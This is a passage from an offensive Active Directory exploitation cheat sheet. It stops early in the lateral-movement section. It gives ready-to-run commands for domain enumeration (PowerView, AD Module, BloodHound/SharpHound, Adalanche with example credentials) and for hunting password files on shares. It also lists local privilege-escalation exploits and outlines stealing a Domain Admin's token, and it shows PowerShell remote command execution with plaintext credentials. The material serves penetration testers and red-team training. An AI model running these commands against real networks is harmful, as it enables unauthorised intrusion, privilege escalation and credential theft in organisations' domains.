Active Directory Exploitation Cheat Sheet

This cheat sheet contains common enumeration and attack methods for Windows Active Directory.

This cheat sheet is inspired by the PayloadAllTheThings repo.

Summary

• Active Directory Exploitation Cheat Sheet
  • Summary
  • Tools
  • Domain Enumeration
    • Using PowerView
    • Using AD Module
    • Using BloodHound
      • Remote BloodHound
      • On Site BloodHound
    • Using Adalanche
      • Remote adalanche
    • Useful Enumeration Tools
  • Local Privilege Escalation
    • Useful Local Priv Esc Tools
  • Lateral Movement
    • Powershell Remoting
    • Remote Code Execution with PS Credentials
    • Import a PowerShell Module and Execute its Functions Remotely
    • Executing Remote Stateful commands
    • Mimikatz
    • Remote Desktop Protocol
    • URL File Attacks
    • Useful Tools
  • Domain Privilege Escalation
    • Kerberoast
    • ASREPRoast
    • Password Spray Attack
    • Force Set SPN
    • Abusing Shadow Copies
    • List and Decrypt Stored Credentials using Mimikatz
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • DNSAdmins Abuse
    • Abusing Active Directory-Integraded DNS
    • Abusing Backup Operators Group
    • Abusing Exchange
    • Weaponizing Printer Bug
    • Abusing ACLs
    • Abusing IPv6 with mitm6
    • SID History Abuse
    • Exploiting SharePoint
    • Zerologon
    • PrintNightmare
    • Active Directory Certificate Services
    • No PAC
  • Domain Persistence
    • Golden Ticket Attack
    • DCsync Attack
    • Silver Ticket Attack
    • Skeleton Key Attack
    • DSRM Abuse
    • Custom SSP
  • Cross Forest Attacks
    • Trust Tickets
    • Abuse MSSQL Servers
    • Breaking Forest Trusts

Tools

• Powersploit
• PowerUpSQL
• Powermad
• Impacket
• Mimikatz
• Rubeus -> Compiled Version
• BloodHound
• AD Module
• ASREPRoast
• Adalanche

Domain Enumeration

Using PowerView

Powerview v.3.0
Powerview Wiki

• Get Current Domain: Get-Domain

• Enumerate Other Domains: Get-Domain -Domain <DomainName>

• Get Domain SID: Get-DomainSID

• Get Domain Policy:

  Get-DomainPolicy
  
  #Will show us the policy configurations of the Domain about system access or kerberos
  Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
  Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
  

• Get Domain Controllers:

  Get-DomainController
  Get-DomainController -Domain <DomainName>
  

• Enumerate Domain Users:

  #Save all Domain Users to a file
  Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
  
  #Will return specific properties of a specific user
  Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
  
  #Enumerate user logged on a machine
  Get-NetLoggedon -ComputerName <ComputerName>
  
  #Enumerate Session Information for a machine
  Get-NetSession -ComputerName <ComputerName>
  
  #Enumerate domain machines of the current/specified domain where specific users are logged into
  Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
  

• Enum Domain Computers:

  Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
  
  #Enumerate Live machines
  Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
  

• Enum Groups and Group Members:

  #Save all Domain Groups to a file:
  Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
  
  #Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
  Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
  Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
  
  #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
  Get-NetLocalGroup | Select-Object GroupName
  
  #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
  Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
  
  #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
  Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
  

• Enumerate Shares:

  #Enumerate Domain Shares
  Find-DomainShare
  
  #Enumerate Domain Shares the current user has access
  Find-DomainShare -CheckShareAccess
  
  #Enumerate "Interesting" Files on accessible shares
  Find-InterestingDomainShareFile -Include *passwords*
  

• Enum Group Policies:

  Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
  
  #Enumerate all GPOs to a specific computer
  Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
  
  #Get users that are part of a Machine's local Admin group
  Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
  

• Enum OUs:

  Get-DomainOU -Properties Name | Sort-Object -Property Name
  

• Enum ACLs:

  # Returns the ACLs associated with the specified account
  Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
  
  #Search for interesting ACEs
  Find-InterestingDomainAcl -ResolveGUIDs
  
  #Check the ACLs associated with a specified path (e.g smb share)
  Get-PathAcl -Path "\\Path\Of\A\Share"
  

• Enum Domain Trust:

  Get-DomainTrust
  Get-DomainTrust -Domain <DomainName>
  
  #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
  Get-DomainTrustMapping
  

• Enum Forest Trust:

  Get-ForestDomain
  Get-ForestDomain -Forest <ForestName>
  
  #Map the Trust of the Forest
  Get-ForestTrust
  Get-ForestTrust -Forest <ForestName>
  

• User Hunting:

  #Finds all machines on the current domain where the current user has local admin access
  Find-LocalAdminAccess -Verbose
  
  #Find local admins on all machines of the domain
  Find-DomainLocalGroupMember -Verbose
  
  #Find computers were a Domain Admin OR a spesified user has a session
  Find-DomainUserLocation | Select-Object UserName, SessionFromName
  
  #Confirming admin access
  Test-AdminAccess
  

  :heavy_exclamation_mark: Priv Esc to Domain Admin with User Hunting:
  I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!

Using AD Module

• Get Current Domain: Get-ADDomain

• Enum Other Domains: Get-ADDomain -Identity <Domain>

• Get Domain SID: Get-DomainSID

• Get Domain Controlers:

  Get-ADDomainController
  Get-ADDomainController -Identity <DomainName>
  

• Enumerate Domain Users:

  Get-ADUser -Filter * -Identity <user> -Properties *
  
  #Get a spesific "string" on a user's attribute
  Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
  

• Enum Domain Computers:

  Get-ADComputer -Filter * -Properties *
  Get-ADGroup -Filter *
  

• Enum Domain Trust:

  Get-ADTrust -Filter *
  Get-ADTrust -Identity <DomainName>
  

• Enum Forest Trust:

  Get-ADForest
  Get-ADForest -Identity <ForestName>
  
  #Domains of Forest Enumeration
  (Get-ADForest).Domains
  

• Enum Local AppLocker Effective Policy:

  Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
  

Using BloodHound

Remote BloodHound

Python BloodHound Repository or install it with pip3 install bloodhound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All

On Site BloodHound

#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>

Using Adalanche

Remote Adalanche

# kali linux:
./adalanche collect activedirectory --domain <Domain> \
--username <Username@Domain> --password <Password> \
--server <DC>

# Example:
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb
## -> Terminating successfully

## Any error?:

# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?

./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389

# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389 \
--authmode basic

# Analyze data 
# go to web browser -> 127.0.0.1:8080
./adalanche analyze

Useful Enumeration Tools

• ldapdomaindump Information dumper via LDAP
• adidnsdump Integrated DNS dumping by any authenticated user
• ACLight Advanced Discovery of Privileged Accounts
• ADRecon Detailed Active Directory Recon Tool

Local Privilege Escalation

• Windows Local Privilege Escalation Cookbook Cookbook for Windows Local Privilege Escalations

• Juicy Potato Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation

  :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803

• Lovely Potato Automated Juicy Potato

  :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803

• PrintSpoofer Exploit the PrinterBug for System Impersonation

  :pray: Works for Windows Server 2019 and Windows 10

• RoguePotato Upgraded Juicy Potato

  :pray: Works for Windows Server 2019 and Windows 10

• Abusing Token Privileges

• SMBGhost CVE-2020-0796
  PoC

• CVE-2021-36934 (HiveNightmare/SeriousSAM)

Useful Local Priv Esc Tools

• PowerUp Misconfiguration Abuse
• BeRoot General Priv Esc Enumeration Tool
• Privesc General Priv Esc Enumeration Tool
• FullPowers Restore A Service Account's Privileges

Lateral Movement

PowerShell Remoting

#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting

#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>

Remote Code Execution with PS Credentials

$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}

Import a PowerShell Module and Execute its Functions Remotely

#Execute the command and start a session
Invoke-Command